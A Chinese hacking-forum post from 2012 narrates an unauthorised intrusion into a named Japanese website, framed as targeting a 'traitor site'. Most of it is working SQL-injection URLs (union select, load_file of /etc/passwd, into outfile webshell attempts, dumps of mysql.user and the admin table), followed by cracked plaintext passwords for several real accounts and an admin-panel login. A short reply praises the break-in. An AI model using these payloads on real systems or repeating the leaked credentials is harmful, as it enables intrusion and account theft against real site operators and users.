找回密码
 立即注册
查看: 3681|回复: 1
打印 上一主题 下一主题

原创 检测汉奸站全过程

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-17 16:22:02 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
补:www.zuaa.jp测试
( i3 t! |2 f; U) i

3 u& d7 Q) i! M( w0x01. 检测 www.zuaa.jp 收集数据* o% y+ z& s& u( H

, `$ _" F) a0 S) Y( g, m* A. |, K, N1 D) a2 |: b
whatweb
6 w3 R! ?  ~7 Q+ U7 O+ A$ i& J8 D" v: N
9 L& F# g: N+ k/ Q
利用NMAP扫描
# ^; H" \; |4 |, I/ H4 Y
/ O& w! K; y/ c. G3 W/ s) [+ \! \; u中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持
8 x2 I0 o3 u+ V% O6 S; R  I0x02.找注入点5 z8 i; q0 z, x) I1 C
找注入点:http://www.zuaa.jp/php/newsdetail.php?topic_id=390) H0 O) T1 j$ \& Y2 d0 U

& C2 o  T( B  l9 n
% P3 [6 t& g$ k0x03.order by8 T5 K, I) a- T+ U1 Y1 W* ^& H
             http://www.zuaa.jp/php/newsdetail.php?topic_id=390 order by 1
, i: Y: R9 H1 U# `& z: W$ ?$ f" J9 A, K$ y9 U
order by 28报错,order by 27正常
% z; R" @2 l9 C2 H. A% R7 k2 h& x4 A( O
0x04.   union手动查询6 I7 y- w% q/ K9 N- W. p
http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
7 D! Q- F. a- B* n& g- ~9 b2 M添加到 27 时正常显示
2 m( K) F- @; ^( H. I, N6 L( v( e/ a  u  [( m
中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持
: @8 H9 d; m' E. L. s/ x4 J. i6 ~" u' ^0 w9 P! k1 @
0x05. info:, b& x# ^8 [+ |1 g
http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,group_concat(user(),0x3a,database(),0x3a,version(),0x3a,@@version_conpile_os),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 & j: R' g) r$ z
; x4 I" n4 K+ [: D
user:            root@localhost
- u: S, V/ L0 c: ^2 Ddatabase:    openpne4 [" K4 w0 E3 j2 t
version:      4.1.22
6 ]- f1 l5 ]5 s6 x, s/ Eos:             portbld-freebsd5.4
" d. ^; N, b+ C) e6 p: P% ?3 C$ V) n4 f/ Z$ J4 R4 L7 b9 Y
0x06. root用户7 U2 U) l. q8 D
利用 load_file(0x...), 读文件 (/etc/passwd), 也可以这样 hex(load_file(0x.....)), 然后把得到的 hex ,再转换成字符的(这种方法, 可以过大多数站)5 c6 p; N0 S, W% \- b
http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,hex(load_file(0x2f6574632f706173737764)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
5 v2 @0 c& G4 i) h5 n
2 E* z+ O6 s1 U  f  ~+ g通过工具转换
, Q0 A7 I& T% R( K9 f/ `
+ j7 Q5 p; j5 x2 }$ v, |- x' S中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持
1 L& c/ J+ x1 \# P$ j# `6 k! s) G" F- `7 D% s
0x07. 利用 into outfile
. n  S" J9 W$ L, g' A0 k全部都失败
, w/ G  r8 }5 S. ?. q1 s% r% Q* t. Hhttp://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/zuaa_tech/WEBSITE/htdocs/php/help.php/ t" w3 E# n7 N  [6 y

7 \+ d! v# o! x: v5 a' Bhttp://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/qian/OpenPNE/lib/help.php
! ?2 L1 x$ M+ Y/ W# R: Q8 [# q( P7 S8 ^; t  S. ~4 e! J7 }  z
页面显示“MDB2 Error:syntax error”
5 b, m, j4 U- x9 T, P: Y% Y  g1 K) U: |0 m; t
0x08. 利用 mysql 4.1
7 R. L. O# W6 I+ Y5 [猜常规表名,字段未果 工具 sqlmap+ c& H  j" z0 y6 g" N/ [
中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持# `$ n+ U7 F' ~

9 n) [; i' [& ?
/ d; T7 g; E4 _. F+ x& O7 m2 b! J9 ]+ O- s* H% a
0x09. 查找后台) j( j5 R3 T9 d- V1 @% Y( l
利用 现有的各种 后台工具尝试都不行" X+ w# n- v5 E! O) ?8 b
7 D' y: ?' \( T2 t9 j
0x10.  MySL外联方法( g0 q; i) R. [$ ?5 P
从前面 nmap 收集的信息当中,可以看到开了 mysql 3306 端口 ,尝试得 mysql 用户各密码,然后再通过 mysql 工具外连 www.zuaa.jp 不行6 c/ H* E. |' w2 `
可以利用 mysql ( 4.x 5.) 自带的定义表 mysql.user
7 B$ ?8 v6 _5 |$ Z* Ehttp://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(user,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+mysql.user; y7 [# v6 v) T$ g* Z* F# d

. ], s) j3 c' [! j$ n/ u这个可以在 www.cmd5.com 解密
9 ~6 m0 [- G1 p" [6 Sroot:*3711D518F2924AEFA6F4C6B4B7425CAE8BEB88AB zuaa2009. c3 |0 v  T( v* ]
chen:*2A09A939E6B654877DD70B00EA631D1007E58CC9 silkroad97
1 N1 s" z) Q; r+ g, j  Qopenpne:*5D80C62EC4D258534F 07D08CCE9CE27DFF26A366 ???
( a. A1 G2 w6 vzuaa:*5D80C62EC4D258534F07D08CCE9CE27DFF26A366 ???# c5 m4 y% `% t: H1 f; s( r; d" C+ b
工具外连失败,据说防火墙策略只允许特定IP外连,具体不得知- L  W3 I0 t7 G, B7 S4 D6 W
$ d) }6 k$ y( j  }- L' Q

9 {: Y  W. g5 L6 c# b; b) B0x11. 网站突破4 n  Z8 {, @5 z$ l5 ^
发现网站的源程序 openpne, google 下载 openpne 源码; `" U% j- Z# r3 V0 e' E
3 M) H3 v" x( s: K7 O  J" q

/ `: I! F0 Q* X6 S0x12. 默认信息利用
' W+ H7 B/ `  S2 i( [* L# Hhttp://sns.zuaa.jp/?m=admin&a=page_login
& F( U! V* m+ Y3 C$ ^5 a0 ?
, d4 M' z0 I5 D& ]7 O4 ^表名 (c_admin_user) ,字段名(username,password)
' x5 K9 H2 z& u+ }http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+c_admin_user' D5 C. R3 H6 |/ i6 @; t6 i
* J* e( X; O: K; h
解密! A. P+ t+ a( U9 p" S$ z) D6 K
zuaa_tech:dd041e2 b1b8ecee164a6cb196a496eda,               zuaa20096 E/ \8 A2 y& f+ q8 M4 G
zuaajp:c0923ec5857796a393da99905008c176,          zju1897
$ `* c' z5 p8 {) g; v/ Z# y; `) m+ Z# J9 `2 V
中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持
0 q8 ~, [6 J8 [/ @) t# p* U% P( D5 D* R
0x13. 登录后台
7 a2 Z1 s4 }' n8 t( u6 b. e! ]. @4 `0 s
. ?$ ^% n9 \/ b! f* Y5 l. `- x; f( E

9 B4 j7 a5 p- m; r' m; Z0x14. 小结5 ~* \: n# q2 [1 O8 v
利用网站相关信息,进行突破 利用网站相关信息,进行突破 利用网站相关信息,进行突破 利用网站相关信息,进行突破 。# z9 a+ d/ q! L" D2 Z
感谢群 ---- 渗透 -酷帅王子 提供注入点 提供注入点* B, |6 f! a6 m' u. a9 Z: L
------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- -------------------------------------------------------By DarkRain
$ ~5 T% @1 q; P# W2 Q# B中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持
$ W+ U! D9 U  {! h+ u+ P# z/ D+ S' E" J7 [7 }9 y" G
最后声明:本人只负责了整理上传到论坛,让大家学习,不是原作者,原作者辛苦了!2 P/ {/ y4 l) z3 }

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

沙发
发表于 2012-9-19 08:27:03 | 只看该作者
哪个牛人 费的这劲 入侵的
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表